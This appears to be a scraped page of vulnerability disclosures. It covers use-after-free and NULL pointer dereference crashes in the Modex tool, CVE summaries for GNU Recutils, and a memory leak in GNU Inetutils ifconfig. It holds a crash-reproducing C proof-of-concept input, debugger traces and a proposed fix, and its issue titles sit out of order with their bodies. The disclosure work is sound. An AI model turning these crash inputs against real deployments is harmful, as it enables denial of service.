────────────────────────────────────────\[ STACK \]────────────────────────────────────────
00:0000│ rsp 0x7fffffffdc90 —▸ 0x55555558c130 (\_\_libc\_csu\_init) ◂— endbr64
01:0008│     0x7fffffffdc98 —▸ 0x7fffffffdcc0 —▸ 0x7fffffffdf40 —▸ 0x7fffffffe090 ◂— 0x0
02:0010│     0x7fffffffdca0 —▸ 0x5555555585c0 (\_start) ◂— endbr64
03:0018│     0x7fffffffdca8 —▸ 0x55555555b17e (Fclose+69) ◂— nop
04:0020│     0x7fffffffdcb0 —▸ 0x555555573208 (top\_of\_stack+28) ◂— test   eax, eax
05:0028│     0x7fffffffdcb8 —▸ 0x5555555b96b0 —▸ 0x5555555ba020 ◂— 0x0
06:0030│     0x7fffffffdcc0 —▸ 0x7fffffffdf40 —▸ 0x7fffffffe090 ◂— 0x0
07:0038│     0x7fffffffdcc8 —▸ 0x55555555f440 (process\_input+883) ◂— mov    qword ptr \[rbp - 0x260\], 0
──────────────────────────────────────\[ BACKTRACE \]──────────────────────────────────────
 ► f 0   0x7ffff7cf603e fclose+238
   f 1   0x7ffff7cf603e fclose+238
   f 2   0x55555555b17e Fclose+69
   f 3   0x55555555f440 process\_input+883
   f 4   0x55555555f780 main+624
   f 5   0x7ffff7c980b3 \_\_libc\_start\_main+243
─────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bin
tcachebins
0x1e0 \[  2\]: 0x5555555b96b0 —▸ 0x5555555ba020 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
0xe00: 0x5555555b98f0 —▸ 0x7ffff7e5d1f0 (main\_arena+1648) ◂— 0x5555555b98f0
pwndbg> x/10gx 0x5555555b96b0
0x5555555b96b0: 0x00005555555ba020      0x00005555555bba90
0x5555555b96c0: 0x00005555555bba90      0x00005555555bba90
0x5555555b96d0: 0x00005555555bba90      0x00005555555bba90
0x5555555b96e0: 0x00005555555bba90      0x0000000000000000
0x5555555b96f0: 0x0000000000000000      0x0000000000000000
pwndbg> bt
#0  0x00007ffff7cf603e in \_IO\_deallocate\_file (fp=0x5555555b96b0) at libioP.h:863
#1  \_IO\_new\_fclose (fp=0x5555555b96b0) at iofclose.c:74
#2  0x000055555555b17e in Fclose (fd=0x5555555b96b0) at modex.c:105
#3  0x000055555555f440 in process\_input (f=0x7ffff7b6d0a0 "./poc.c", phase2=0) at modex.c:1243
#4  0x000055555555f780 in main (argc=2, argv=0x7fffffffe188) at modex.c:1306
#5  0x00007ffff7c980b3 in \_\_libc\_start\_main (main=0x55555555f510 <main>, argc=2, argv=0x7fffffffe188, init=<optimized out>, fini=<optimized out>, rtld\_fini=<optimized out>, stack\_end=0x7fffffffe178) at ../csu/libc-start.c:308
#6  0x00005555555585ee in \_start ()

CVE-2021-46169: Use After Free · Issue #10 · nimble-code/Modex

Modex v2.11 was discovered to contain a NULL pointer dereference in set_create_id() at xtract.c.

**NULL Pointer Dereference in set\_create\_id()****Description**

NULL Pointer Dereference in `set_create_id()` at xtract.c:3797.

If there is no `&` in the first argument of `pthread_t()`, `s` will be NULL and the next `strchr()` will crash.

void
set\_create\_id(void)	// from the 1st '&(' to the 1st '),' in OutBuf
{	char \*s, \*e;

	join\_id = 0;
	s = strchr(OutBuf, '&');
	e = strchr(s+1, ')');
	if (!e || e-s <= 1) { return; }

	join\_id = (char \*) e\_malloc((e-s) \* sizeof(char));
	strncpy(join\_id, s+2, (e-s)-1\-1);
}

 pthread\_create(&t, 0, thread, 0);
 ► 0x55555556aa76 <set\_create\_id+35\>    call   strchr@plt                <strchr@plt>
        s: 0x5555555a2080 (OutBuf) ◂— 'F: pthread\_create((&(Pp\_main->t)),0,Pp\_main->thread,0)'
        c: 0x26

pthread\_create(a, 0, thread, 0);
► 0x55555556aa76 <set\_create\_id+35\>    call   strchr@plt                <strchr@plt>
        s: 0x5555555a2080 (OutBuf) ◂— 'F: pthread\_create(Pp\_main->a,0,Pp\_main->thread,0)'
        c: 0x26

**version**

acfa291

    ./modex -V
    MODEX Version 2.11 - 3 November 2017
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**poc**

#include <stdio.h\>
#include <pthread.h\>
void \*thread(){
	puts("hello world");
}
int main(void)
{	pthread\_t t;
	pthread\_t\* a;
	a = &t;
	while(1) {
		pthread\_create(a, 0, thread, 0);
	}
}

**command**

**Result**

    ./modex ./poc.c
    MODEX Version 2.11 - 3 November 2017
    [1]    2056163 segmentation fault  ./modex ./poc.c
    

**gdb**

    pwndbg>
    0x000055555556aa8f      3797            e = strchr(s+1, ')');
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0x1
     RBX  0x55555558c0f0 (__libc_csu_init) ◂— endbr64
     RCX  0x0
     RDX  0x0
    *RDI  0x1
     RSI  0x29
     R8   0x212
     R9   0x5555555a2080 (OutBuf) ◂— 'F: pthread_create(Pp_main->t,0,Pp_main->thread,0)'
     R10  0x1e
     R11  0x7fffffffb757 ◂— 0x4c16e0b189dd0030 /* '0' */
     R12  0x5555555585c0 (_start) ◂— endbr64
     R13  0x7fffffffe0f0 ◂— 0x2
     R14  0x0
     R15  0x0
     RBP  0x7fffffffbea0 —▸ 0x7fffffffbee0 —▸ 0x7fffffffc140 —▸ 0x7fffffffc5b0 —▸ 0x7fffffffc5d0 ◂— ...
     RSP  0x7fffffffbe90 ◂— 0x0
    *RIP  0x55555556aa8f (set_create_id+60) ◂— call   0x555555558410
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
       0x55555556aa7b <set_create_id+40>    mov    qword ptr [rbp - 0x10], rax
       0x55555556aa7f <set_create_id+44>    mov    rax, qword ptr [rbp - 0x10]
       0x55555556aa83 <set_create_id+48>    add    rax, 1
       0x55555556aa87 <set_create_id+52>    mov    esi, 0x29
       0x55555556aa8c <set_create_id+57>    mov    rdi, rax
     ► 0x55555556aa8f <set_create_id+60>    call   strchr@plt                <strchr@plt>
            s: 0x1
            c: 0x29
    
       0x55555556aa94 <set_create_id+65>    mov    qword ptr [rbp - 8], rax
       0x55555556aa98 <set_create_id+69>    cmp    qword ptr [rbp - 8], 0
       0x55555556aa9d <set_create_id+74>    je     set_create_id+155                <set_create_id+155>
    
       0x55555556aa9f <set_create_id+76>    mov    rax, qword ptr [rbp - 8]
       0x55555556aaa3 <set_create_id+80>    sub    rax, qword ptr [rbp - 0x10]
    ──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
    In file: /home/aidai/fuzzing/model_checking/Modex-test/Src/xtract.c
       3792 set_create_id(void)     // from the 1st '&(' to the 1st '),' in OutBuf
       3793 {       char *s, *e;
       3794
       3795         join_id = 0;
       3796         s = strchr(OutBuf, '&');
     ► 3797         e = strchr(s+1, ')');
       3798         if (!e || e-s <= 1) { return; }
       3799
       3800         join_id = (char *) e_malloc((e-s) * sizeof(char));
       3801         strncpy(join_id, s+2, (e-s)-1-1);
       3802 }
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp 0x7fffffffbe90 ◂— 0x0
    01:0008│     0x7fffffffbe98 ◂— 0x0
    02:0010│ rbp 0x7fffffffbea0 —▸ 0x7fffffffbee0 —▸ 0x7fffffffc140 —▸ 0x7fffffffc5b0 —▸ 0x7fffffffc5d0 ◂— ...
    03:0018│     0x7fffffffbea8 —▸ 0x55555556b0ce (handle_pthread_create+20) ◂— call   0x55555556aaf1
    04:0020│     0x7fffffffbeb0 ◂— 0x0
    05:0028│     0x7fffffffbeb8 ◂— 0x5558c0f0
    06:0030│     0x7fffffffbec0 —▸ 0x7fffffffc140 —▸ 0x7fffffffc5b0 —▸ 0x7fffffffc5d0 —▸ 0x7fffffffca40 ◂— ...
    07:0038│     0x7fffffffbec8 —▸ 0x5555555585c0 (_start) ◂— endbr64
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x55555556aa8f set_create_id+60
       f 1   0x55555556b0ce handle_pthread_create+20
       f 2   0x55555556cc32 modex_recur+4535
       f 3   0x55555556ee66 modex_node+266
       f 4   0x55555557050c modex_any+85
       f 5   0x55555556f98c modex_node+3120
       f 6   0x55555557050c modex_any+85
       f 7   0x55555556f894 modex_node+2872
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  0x000055555556aa8f in set_create_id () at xtract.c:3797
    #1  0x000055555556b0ce in handle_pthread_create (which=0) at xtract.c:3966
    #2  0x000055555556cc32 in modex_recur (root=0x7ffff7b6e3d8) at xtract.c:4425
    #3  0x000055555556ee66 in modex_node (node=0x7ffff7b6e3d8, tabs=2) at xtract.c:5197
    #4  0x000055555557050c in modex_any (child=0x7ffff7b6e3d8, tabs=2) at xtract.c:5746
    #5  0x000055555556f98c in modex_node (node=0x7ffff7b6e658, tabs=2) at xtract.c:5505
    #6  0x000055555557050c in modex_any (child=0x7ffff7b6e658, tabs=2) at xtract.c:5746
    #7  0x000055555556f894 in modex_node (node=0x7ffff7b6e6f8, tabs=2) at xtract.c:5484
    #8  0x000055555557050c in modex_any (child=0x7ffff7b6e6f8, tabs=2) at xtract.c:5746
    #9  0x000055555556f8af in modex_node (node=0x7ffff7b6e108, tabs=2) at xtract.c:5485
    #10 0x000055555557050c in modex_any (child=0x7ffff7b6e108, tabs=2) at xtract.c:5746
    #11 0x0000555555570357 in modex_for (forn=0x7ffff7b6e1f8, tabs=1) at xtract.c:5701
    #12 0x0000555555570545 in modex_any (child=0x7ffff7b6e1f8, tabs=1) at xtract.c:5756
    #13 0x000055555556f98c in modex_node (node=0x7ffff7b6e6a8, tabs=1) at xtract.c:5505
    #14 0x000055555557050c in modex_any (child=0x7ffff7b6e6a8, tabs=1) at xtract.c:5746
    #15 0x0000555555570b19 in modex_tree (root=0x7ffff7b6e6a8, lut=0x55555558d215 "none.lut") at xtract.c:5852
    #16 0x000055555555f962 in main (argc=2, argv=0x7fffffffe0f8) at modex.c:1337
    #17 0x00007ffff7c980b3 in __libc_start_main (main=0x55555555f510 <main>, argc=2, argv=0x7fffffffe0f8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe0e8) at ../csu/libc-start.c:308
    #18 0x00005555555585ee in _start ()
    

**fix**

Should we add some code here to handle it?

If there is no `&`，get the substring from the 1st '(' to the 1st ',' in OutBuf.

void
set\_create\_id(void)	// from the 1st '&(' to the 1st '),' in OutBuf or from the 1st '(' to the 1st ',' in OutBuf
{	char \*s, \*e;

	join\_id = 0;
	s = strchr(OutBuf, '&');
	if (s != NULL)
	{	e = strchr(s+1, ')');
	}
	else
	{
		s = strchr(OutBuf, '(')-1;
		e = strchr(s+1, ',');
	}
	if (!e || e-s <= 1) { return; }

	join\_id = (char \*) e\_malloc((e-s) \* sizeof(char));
	strncpy(join\_id, s+2, (e-s)-1\-1);
}

CVE-2021-46171: NULL Pointer Dereference in set_create_id() · Issue #8 · nimble-code/Modex

An untrusted pointer dereference in rec_db_destroy() at rec-db.c of GNU Recutils v1.8.90 can lead to a segmentation fault or application crash.

CVE-2021-46019: Untrusted Pointer Dereference in rec_db_destroy()

An Use-After-Free vulnerability in rec_mset_elem_destroy() at rec-mset.c of GNU Recutils v1.8.90 can lead to a segmentation fault or application crash.

CVE-2021-46022: Use After Free in in rec_mset_elem_destroy() at rec-mset.c:83

GNU Inetutils commit cf091 was discovered to contain a memory leak via the ifconfig function.

\# Memory leak in ifconfig

\## Description

Memory leak in ifconfig

\*\*version\*\*

\`\`\`  
./ifconfig --version  
ifconfig (GNU inetutils) 2.2.16-cf091  
Copyright (C) 2021 Free Software Foundation, Inc.  
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html\>.  
This is free software: you are free to change and redistribute it.  
There is NO WARRANTY, to the extent permitted by law.

Written by Marcus Brinkmann.  
\`\`\`

\*\*System information\*\*  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

\*\*Result\*\*

\`\`\`  
./ifconfig  
docker0   Link encap:Ethernet  HWaddr 02:42:0F:3F:D1:8C  
          inet addr:172.17.0.1  Bcast:172.17.255.255  Mask:255.255.0.0  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1  
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0  
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0  
          collisions:0 txqueuelen:0  
          RX bytes:0  TX bytes:0

ens160    Link encap:Ethernet  HWaddr 00:0C:29:E5:38:0E  
          inet addr:192.168.155.5  Bcast:192.168.155.255  Mask:255.255.254.0  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1  
          RX packets:7327 errors:0 dropped:0 overruns:0 frame:0  
          TX packets:6372 errors:0 dropped:0 overruns:0 carrier:0  
          collisions:0 txqueuelen:1000  
          RX bytes:844586  TX bytes:2386960

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0  
          UP LOOPBACK RUNNING  MTU:65536  Metric:1  
          RX packets:3092 errors:0 dropped:0 overruns:0 frame:0  
          TX packets:3092 errors:0 dropped:0 overruns:0 carrier:0  
          collisions:0 txqueuelen:1000  
          RX bytes:1598123  TX bytes:1598123

\=================================================================  
\==7524==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 64 byte(s) in 1 object(s) allocated from:  
    #0 0x494bdd in malloc (/root/disk2/fuzzing/inetutils/fuzz/bin/ifconfig+0x494bdd)  
    #1 0x4e0330 in linux\_if\_nameindex /root/disk2/fuzzing/inetutils/inetutils/ifconfig/./system/linux.c:948:11  
    #2 0x4cbfd5 in parse\_cmdline /root/disk2/fuzzing/inetutils/inetutils/ifconfig/options.c:678:22  
    #3 0x4c432c in main /root/disk2/fuzzing/inetutils/inetutils/ifconfig/ifconfig.c:56:3

SUMMARY: AddressSanitizer: 64 byte(s) leaked in 1 allocation(s).  
\`\`\`

Tag

#ubuntu